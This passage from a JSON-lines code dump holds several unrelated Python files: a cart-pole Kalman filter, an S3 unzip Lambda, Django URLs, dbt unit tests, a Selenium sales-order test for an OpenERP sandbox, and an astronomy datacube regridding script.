 var[0,idx_var] = 1.0  # differentiate w.r.t the nth variable\n        VAR.append(torch.tensor(var))\n\n\n    # In[Kalman filter]\n    C = np.array([[1., 0., 0., 0.],\n                  [0., 0., 1., 0.]], dtype=np.float32)\n\n    Q_kal = np.diag([0.01, 1, 0.01, 1]).astype(np.float32)\n    R_kal = 10.0*np.eye(2).astype(np.float32)  # no trailing comma here: it would silently turn R_kal into a 1-tuple\n\n    x_est_post_vec = np.zeros((t.size, n_x)).astype(np.float32)\n    x_est_pri_vec = np.zeros((t.size, n_x)).astype(np.float32)\n\n    x_est_pri = x[0, :]  # x[0|-1]\n    P_pri = np.diag([0.01, 100, 0.01, 
100]).astype(np.float32) # P[0|-1]\n I_nx = np.eye(n_x, n_x).astype(np.float32)\n\n for time_idx in range(len(t)):\n ui = u[time_idx,:]\n yi = y_noise[time_idx,:]\n\n xi_torch = torch.tensor(x_est_pri, requires_grad=True) # measurement\n ui_torch = torch.tensor(ui, requires_grad=True)\n\n x_est_pri_vec[time_idx] = x_est_pri\n\n f_xu = ss_model(xi_torch, ui_torch)\n Ak = np.empty((n_x, n_x),dtype=np.float32)\n Bk = np.empty((n_x, n_u), dtype=np.float32)\n for idx_var in range(n_x):\n var = VAR[idx_var]\n f_xu.backward(var, retain_graph=True)\n Ak[idx_var, :] = np.array(xi_torch.grad)\n Bk[idx_var, :] = np.array(ui_torch.grad)\n xi_torch.grad.data.zero_()\n ui_torch.grad.data.zero_()\n Ak = Ak + I_nx\n Ck = C\n\n y_est_pri = Ck @ x_est_pri # y[k|k-1]\n Sk = Ck @ P_pri @ Ck.T + R_kal # Innovation covariance\n Kk = P_pri @ Ck.T @ np.linalg.inv(Sk)\n x_est_post = x_est_pri + Kk @ (yi - y_est_pri) # x[k|k]\n\n P_post = (I_nx - Kk @ Ck) @ P_pri # P[k|k]\n x_est_post_vec[time_idx,:] = x_est_post\n\n f_xu_np = f_xu.clone().data.cpu().numpy()\n x_est_pri = x_est_post + f_xu_np # x[k+1|k] predict step\n x_est_pri = x_est_pri.ravel()\n\n P_pri = Ak @ P_post @ Ak.T + Q_kal # P[k|k-1]\n\n\n\n fig,ax = plt.subplots(4,1,figsize=(20,10), sharex=True)\n ax[0].plot(t[:n_plot], y_noise[:n_plot, 0], 'k', label='Measured')\n ax[0].plot(t[:n_plot], x_est_post_vec[:n_plot, 0], label='Predicted')\n ax[0].plot(t[:n_plot], x[:n_plot, 0], label='True')\n ax[0].set_xlabel(\"Time (s)\")\n ax[0].set_ylabel(\"Position p (m)\")\n ax[0].legend()\n ax[0].grid()\n\n ax[1].plot(t[:n_plot], x[:n_plot, 1], label='True')\n ax[1].plot(t[:n_plot], x_est_post_vec[:n_plot, 1], label='Predicted')\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Speed v (m/s)\")\n ax[1].legend()\n ax[1].grid()\n\n ax[2].plot(t[:n_plot], y_noise[:n_plot, 1], 'k', label='Measured')\n ax[2].plot(t[:n_plot], x_est_post_vec[:n_plot, 2], label='Predicted')\n ax[2].plot(t[:n_plot], x[:n_plot, 2], label='True')\n ax[2].set_xlabel(\"Time (s)\")\n ax[2].set_ylabel(\"Angle $\\phi$ (rad)\")\n ax[2].legend()\n ax[2].grid()\n\n ax[3].plot(t[:n_plot], x[:n_plot, 3], label='True')\n ax[3].plot(t[:n_plot], x_est_post_vec[:n_plot, 3], label='Predicted')\n ax[3].set_xlabel(\"Time (s)\")\n ax[3].set_ylabel(\"Angular velocity $\\omega$ (rad/s)\")\n ax[3].legend()\n ax[3].grid()\n", "sub_path": "examples/cartpole_example/test/cartpole_ref_kalman_filter.py", "file_name": "cartpole_ref_kalman_filter.py", "file_ext": "py", "file_size_in_byte": 7885, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 28, 
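Editor's aside: the Kalman loop above linearizes the learned dynamics by calling backward() once per one-hot vector to fill Ak and Bk row by row. On recent PyTorch the same Jacobians can be taken in a single call; a toy sketch with stand-in dynamics (f below is an assumption for illustration, not the ss_model from the record):

import torch
from torch.autograd.functional import jacobian

def f(x, u):
    # stand-in continuous-time dynamics, chosen only for illustration
    return torch.stack([x[1], -x[0] + u[0]])

x = torch.tensor([0.1, 0.2])
u = torch.tensor([0.5])
A_c, B_c = jacobian(f, (x, u))   # df/dx and df/du in one call
A_k = torch.eye(2) + A_c         # discrete-time A = I + df/dx, as in the loop above
print(A_k, B_c)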
"usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torchid.ssmodels.CartPoleStateSpaceModel", "line_number": 42, "usage_type": "call"}, {"api_name": "torchid.ssfitter.NeuralStateSpaceSimulator", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 155, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float32", 
"line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 189, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}]} +{"seq_id": "154428738", "text": "import json\nimport boto3\nfrom io import BytesIO\nimport zipfile\n\ndef lambda_handler(event, context):\n s3_resource = boto3.resource('s3')\n source_bucket = event['Records'][0]['s3']['bucket']['name']\n target_bucket = source_bucket\n key_file = event['Records'][0]['s3']['object']['key']\n\n my_bucket = s3_resource.Bucket(source_bucket)\n\n zip_obj = s3_resource.Object(bucket_name=source_bucket, key=key_file)\n buffer = BytesIO(zip_obj.get()[\"Body\"].read())\n z = zipfile.ZipFile(buffer)\n for filename in z.namelist():\n file_info = z.getinfo(filename)\n try:\n response = s3_resource.meta.client.upload_fileobj(\n z.open(filename),\n Bucket=target_bucket,\n Key=f'{filename}'\n )\n except Exception as e:\n print(e)\n", "sub_path": "lambda.py", "file_name": "lambda.py", "file_ext": "py", "file_size_in_byte": 826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "boto3.resource", "line_number": 7, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 15, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "124619413", "text": "from django.conf.urls import url\nfrom django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n\n # indexes\n url(r'^$', views.index, name='blog_index'),\n url(r'^category/(?P\\d+)-(?P\\w+)/$', views.category, name='blog_category'),\n\n # archives\n url(r'^archive/(?P\\d{4})/$', views.archive_year, name='blog_archive_year'),\n url(r'^archive/(?P\\d{4})/(?P\\d{2})/$', views.archive_month, name='blog_archive_month'),\n url(r'^archive/(?P\\d{4})/(?P\\d{2})/(?P\\d{2})/$', views.archive_day,\n name='blog_archive_day'),\n\n # details\n url(r'^details/$', views.details,\n name='blog_details'),\n\n # youtube\n url(r'^youtube/$', views.youtube,\n name='blog_youtube'),\n\n # organizations\n url(r'^organizations/$', views.organizations,\n name='blog_organizations'),\n\n # ads_names\n url(r'^ads_names/$', views.ads_names,\n name='blog_ads_names'),\n\n # mail_naming\n url(r'^mail_naming/$', views.mail_naming,\n name='blog_mail_naming'),\n\n url(r'^upload/$', views.upload_file, name='upload'),\n\n url(r'^youtube_parser', views.youtube_parser, name='youtube_parser'),\n]\n", "sub_path": "BafosApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1464, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "299914352", "text": "import unittest\nfrom unittest import mock\n\nfrom dbt.contracts.graph.parsed import ParsedModelNode, NodeConfig, DependsOn\nfrom dbt.context import parser, runtime\nfrom dbt.node_types import NodeType\nimport dbt.exceptions\nfrom .mock_adapter import adapter_factory\n\n\nclass TestVar(unittest.TestCase):\n def setUp(self):\n self.model = ParsedModelNode(\n alias='model_one',\n name='model_one',\n database='dbt',\n schema='analytics',\n resource_type=NodeType.Model,\n unique_id='model.root.model_one',\n fqn=['root', 'model_one'],\n package_name='root',\n original_file_path='model_one.sql',\n root_path='/usr/src/app',\n refs=[],\n sources=[],\n depends_on=DependsOn(),\n config=NodeConfig.from_dict({\n 'enabled': True,\n 'materialized': 'view',\n 'persist_docs': {},\n 'post-hook': [],\n 'pre-hook': [],\n 'vars': {},\n 'quoting': {},\n 'column_types': {},\n 'tags': [],\n }),\n tags=[],\n path='model_one.sql',\n raw_sql='',\n description='',\n columns={}\n )\n self.context = mock.MagicMock()\n\n def test_var_default_something(self):\n var = runtime.Var(self.model, self.context, overrides={'foo': 'baz'})\n self.assertEqual(var('foo'), 'baz')\n self.assertEqual(var('foo', 'bar'), 'baz')\n\n def test_var_default_none(self):\n var = runtime.Var(self.model, self.context, overrides={'foo': None})\n self.assertEqual(var('foo'), None)\n 
self.assertEqual(var('foo', 'bar'), None)\n\n def test_var_not_defined(self):\n var = runtime.Var(self.model, self.context, overrides={})\n\n self.assertEqual(var('foo', 'bar'), 'bar')\n with self.assertRaises(dbt.exceptions.CompilationException):\n var('foo')\n\n def test_parser_var_default_something(self):\n var = parser.Var(self.model, self.context, overrides={'foo': 'baz'})\n self.assertEqual(var('foo'), 'baz')\n self.assertEqual(var('foo', 'bar'), 'baz')\n\n def test_parser_var_default_none(self):\n var = parser.Var(self.model, self.context, overrides={'foo': None})\n self.assertEqual(var('foo'), None)\n self.assertEqual(var('foo', 'bar'), None)\n\n def test_parser_var_not_defined(self):\n # at parse-time, we should not raise if we encounter a missing var\n # that way disabled models don't get parse errors\n var = parser.Var(self.model, self.context, overrides={})\n\n self.assertEqual(var('foo', 'bar'), 'bar')\n self.assertEqual(var('foo'), None)\n\n\nclass TestParseWrapper(unittest.TestCase):\n def setUp(self):\n self.mock_config = mock.MagicMock()\n adapter_class = adapter_factory()\n self.mock_adapter = adapter_class(self.mock_config)\n self.wrapper = parser.DatabaseWrapper(self.mock_adapter)\n self.responder = self.mock_adapter.responder\n\n def test_unwrapped_method(self):\n self.assertEqual(self.wrapper.quote('test_value'), '\"test_value\"')\n self.responder.quote.assert_called_once_with('test_value')\n\n def test_wrapped_method(self):\n found = self.wrapper.get_relation('database', 'schema', 'identifier')\n self.assertEqual(found, None)\n self.responder.get_relation.assert_not_called()\n\n\nclass TestRuntimeWrapper(unittest.TestCase):\n def setUp(self):\n self.mock_config = mock.MagicMock()\n self.mock_config.quoting = {'database': True, 'schema': True, 'identifier': True}\n adapter_class = adapter_factory()\n self.mock_adapter = adapter_class(self.mock_config)\n self.wrapper = runtime.DatabaseWrapper(self.mock_adapter)\n self.responder = self.mock_adapter.responder\n\n def test_unwrapped_method(self):\n # the 'quote' method isn't wrapped, we should get our expected inputs\n self.assertEqual(self.wrapper.quote('test_value'), '\"test_value\"')\n self.responder.quote.assert_called_once_with('test_value')\n\n def test_wrapped_method(self):\n rel = mock.MagicMock()\n rel.matches.return_value = True\n self.responder.list_relations_without_caching.return_value = [rel]\n\n found = self.wrapper.get_relation('database', 'schema', 'identifier')\n\n self.assertEqual(found, rel)\n # it gets called with an information schema relation as the first arg,\n # which is hard to mock.\n self.responder.list_relations_without_caching.assert_called_once_with(\n mock.ANY, 'schema'\n )\n", "sub_path": "test/unit/test_context.py", "file_name": "test_context.py", "file_ext": "py", "file_size_in_byte": 4713, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "dbt.contracts.graph.parsed.ParsedModelNode", "line_number": 13, "usage_type": "call"}, {"api_name": "dbt.node_types.NodeType.Model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "dbt.node_types.NodeType", "line_number": 18, "usage_type": "name"}, {"api_name": "dbt.contracts.graph.parsed.DependsOn", "line_number": 26, "usage_type": "call"}, {"api_name": "dbt.contracts.graph.parsed.NodeConfig.from_dict", "line_number": 27, "usage_type": "call"}, {"api_name": 
"dbt.contracts.graph.parsed.NodeConfig", "line_number": 27, "usage_type": "name"}, {"api_name": "unittest.mock.MagicMock", "line_number": 44, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 44, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 47, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 47, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 52, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 52, "usage_type": "name"}, {"api_name": "dbt.context.runtime.Var", "line_number": 57, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 57, "usage_type": "name"}, {"api_name": "dbt.contracts.graph.parsed.exceptions", "line_number": 60, "usage_type": "attribute"}, {"api_name": "dbt.contracts.graph.parsed", "line_number": 60, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 64, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 64, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 69, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 69, "usage_type": "name"}, {"api_name": "dbt.context.parser.Var", "line_number": 76, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 76, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 82, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 84, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 84, "usage_type": "name"}, {"api_name": "mock_adapter.adapter_factory", "line_number": 85, "usage_type": "call"}, {"api_name": "dbt.context.parser.DatabaseWrapper", "line_number": 87, "usage_type": "call"}, {"api_name": "dbt.context.parser", "line_number": 87, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 100, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 102, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 102, "usage_type": "name"}, {"api_name": "mock_adapter.adapter_factory", "line_number": 104, "usage_type": "call"}, {"api_name": "dbt.context.runtime.DatabaseWrapper", "line_number": 106, "usage_type": "call"}, {"api_name": "dbt.context.runtime", "line_number": 106, "usage_type": "name"}, {"api_name": "unittest.mock.MagicMock", "line_number": 115, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 115, "usage_type": "name"}, {"api_name": "unittest.mock.ANY", "line_number": 125, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "184701090", "text": "import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\n\nfrom selenium.common.exceptions import NoAlertPresentException\n\nusr =\"kantar\"\npwd = \"fisherman\"\nurl = \"http://zerp6-sandbox:8069/web/webclient/home\"\n\n# Define global var for further validation\nref_num = None\ninvoice_date = None\ncustomer_name = None\n#salesman = None\n\nclass CreatePO(unittest.TestCase):\n \"\"\"\n This is a test case to create a workflow to create a sales order\n partially using the webdriver library\n 
\"\"\"\n\n def setUp(self):\n \"\"\"\n Set up the necessary dependencies to process the workflow\n \"\"\"\n\n # Create an instance for firefox\n self.driver = webdriver.Firefox()\n # Navigate to the desire openerp web server for testing\n driver = self.driver\n driver.get(url)\n driver.window_handles\n\n #print \"Navigated to the web!!!\"\n\n # Use implicitly wait till the elements get loaded up\n driver.implicitly_wait(2)\n\n # Find the username field and input the login name\n elem = driver.find_element_by_name(\"login\")\n elem.send_keys(usr)\n #print \"Login name is input and sent!!!\"\n\n # Find the password field and input the password\n elem = driver.find_element_by_name(\"password\")\n elem.send_keys(pwd)\n #print \"Login password is input!!!\"\n\n # Find the submit button and click\n driver.find_element_by_name(\"submit\").click()\n #print \"Login info is sent!!!\"\n\n # Use implicitly wait till the DOM gets loaded up\n driver.implicitly_wait(4)\n\n # Find the SALES icon and click it\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[1]/td/div[2]/table/tbody/tr/td[1]/a\").click()\n # Click the Sales Orders on the left column\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[1]/div[2]/div[1]/a[3]/span\").click()\n # Have to let the browser sleep for a while, otherwise it will break\n # implicit and explicit wait do not work here\n time.sleep(2)\n\n\n\n\n def test_so(self):\n \"\"\"\n This function to create a sales order by entering info Customer under\n Sales Order Tab, Product info under Sales Order lines\n \"\"\"\n\n # Define global var to be used in the later function\n global ref_num, invoice_date, customer_name, salesman\n driver = self.driver\n\n # Click Create button to bring up the popup window\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/thead/tr[1]/th/table/tbody/tr/td/button[1]\").click()\n #print \"Navigate to create sales order page!!!\"\n\n driver.implicitly_wait(4)\n # Choose Customer in the Sales Order Tab\n driver.find_element_by_css_selector(\"span.oe-m2o-drop-down-button > img\").click()\n # Choose 1ST CHOICE AV as a customer\n driver.find_element_by_xpath(\"/html/body/ul[3]/li[2]/a\").click()\n\n # Disable the popup windows. 
Since this popup window is part\n # of the page, we will just use the unique identifier to\n # close the window\n driver.find_element_by_css_selector(\"span.ui-icon-closethick\").click()\n\n driver.implicitly_wait(4)\n # Get the Order Ref, Date, Customer Name for later validation\n ref = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[1]/td/table/tbody/tr/td[1]/table/tbody/tr[1]/td[2]/input\")\n ref_num = ref.get_attribute(\"value\")\n date = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[1]/td/table/tbody/tr/td[1]/table/tbody/tr[1]/td[4]/div[2]/input[2]\")\n invoice_date = date.get_attribute(\"value\")\n customer = driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[2]/td/div[1]/table/tbody/tr[1]/td[2]/table/tbody/tr/td[1]/input\")\n customer_name = customer.get_attribute(\"value\")\n\n\n # Wait till the element loads up\n driver.implicitly_wait(4)\n\n # Click create button in Sales Order Lines section\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[5]/div/table/tbody/tr[2]/td/div[1]/table/tbody/tr[6]/td/table/tbody/tr/td[1]/div[2]/div/table/thead/tr[1]/th/table/tbody/tr/td/button\").click()\n\n driver.implicitly_wait(4)\n # Click product dropdown field\n driver.find_element_by_xpath(\"(//img[contains(@src,'http://zerp6-sandbox:8069/web/static/src/img/down-arrow.png')])[9]\").click()\n driver.implicitly_wait(1)\n # Choose [0008] Potentiometer, 10K, straight, threaded\n driver.find_element_by_xpath(\"/html/body/ul[11]/li[1]/a\").click()\n\n driver.implicitly_wait(2)\n # Click Save & Close\n #driver.find_element_by_xpath(\"/html/body/div[12]/div[2]/div/div/div/div[1]/button[2]\").click()\n driver.find_element_by_css_selector(\".oe_selectcreatepopup-form-save\").click()\n\n driver.implicitly_wait(1)\n # Finally click save to finish the order\n driver.find_element_by_css_selector(\".oe_form_button_save\").click()\n #print \"SO is created and saved!!!\"\n\n\n #print ref_num, invoice_date, customer_name, usr.title()\n\n # Find the SALES icon and click it\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[1]/td/div[2]/table/tbody/tr/td[1]/a\").click()\n # Click the Sales Orders on the left column\n driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[1]/div[2]/div[1]/a[3]/span\").click()\n\n driver.implicitly_wait(4)\n # Check the SO number is presented in the first row of the list\n try: self.assertEqual(ref_num, driver.find_element_by_css_selector(\"td.oe-field-cell\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n # Check the invoice date is the current one\n try: self.assertEqual(invoice_date, driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/tbody/tr[1]/td[3]\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n # Check the customer is the same as the one we just created\n try: self.assertEqual(customer_name, driver.find_element_by_xpath(\"/html/body/table/tbody/tr[2]/td/table/tbody/tr/td[2]/div/div/table/tbody/tr[2]/td[1]/div[4]/div/table/tbody/tr[1]/td[4]\").text)\n except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n\n def tearDown(self):\n 
\"\"\"\n Shut down the FF driver\n \"\"\"\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n self.assertTrue(self.is_order_present(By.TAG_NAME, \"body\"))", "sub_path": "web/create_so.py", "file_name": "create_so.py", "file_ext": "py", "file_size_in_byte": 7320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 162, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 163, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 163, "usage_type": "name"}]} +{"seq_id": "53556666", "text": "import numpy as np\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom astropy.io.fits import getheader\nfrom scipy.interpolate import griddata\nfrom copy import copy\n\"\"\"\n\n# To regrid by simply dividing the pixels in halves keeping the same values\n\ndef halfbin_regrid(array):\n '''\n function to regrid an array to\n half the bin size with no interpolation\n at all\n '''\n\n outKsz1=array.shape[0]*2\n outKsz2=array.shape[1]*2\n newarray=np.zeros((outKsz1,outKsz2))\n for i in range(newarray.shape[0]):\n for j in range(newarray.shape[1]):\n newarray[i,j]=array[np.int(np.round((i-0.5)/2.)),np.int(np.round((j-0.5)/2.))]\n\n return newarray\n\ndef halfbin_regrid_cube(cube,flux=False):\n '''\n function to regrid a cube to\n half the bin size with no interpolation\n at all\n '''\n cube2=cube.tolist()\n for i in range(len(cube)):\n\n cube2[i]=halfbin_regrid(cube[i].copy())\n if flux==True:\n \t cube2[i]=cube2[i]*np.sum(cube[i])/np.sum(cube2[i])\n\n cube2=np.array(cube2)\n\n return cube2\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/COS4_08515\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/COS4_08515_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\n#kmos_005 = fits.open(f\"{path}/COS4_08515_005.fits\")[0].data\n\n#regrid the cube, with *rough* flux conservation\nkmos_01 = halfbin_regrid_cube(kmos_02.copy(),flux=False) # Regrid to 0.1\"/pix\nkmos_005 = halfbin_regrid_cube(kmos_01.copy(),flux=False) # Regrid to 0.05\"/pix\n\nhdr = fits.Header()\nhdr = getheader(f\"{path}/COS4_08515_K.fits\",1)\nhduprim = fits.PrimaryHDU(data=kmos_005,header=hdr)\nhdul = fits.HDUList([hduprim])\nhdul.writeto(f'{path}/COS4_08515_005.fits', overwrite=True)\n\"\"\"\n\n# To regrid by using cubic scpline interpolation on the datacube\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/GS4_29868\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/GS4_29868_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\ntrial = kmos_02[682]\n\nprint(trial.shape)\n\nx = np.linspace(0,trial.shape[1],trial.shape[1])\ny = np.linspace(0,trial.shape[0],trial.shape[0])\nX, Y = np.meshgrid(x,y)\n\nprint(X.shape)\nprint(Y.shape)\n\nx = np.linspace(0,trial.shape[1],4*trial.shape[1])\ny = np.linspace(0,trial.shape[0],4*trial.shape[0])\nXi, Yi = 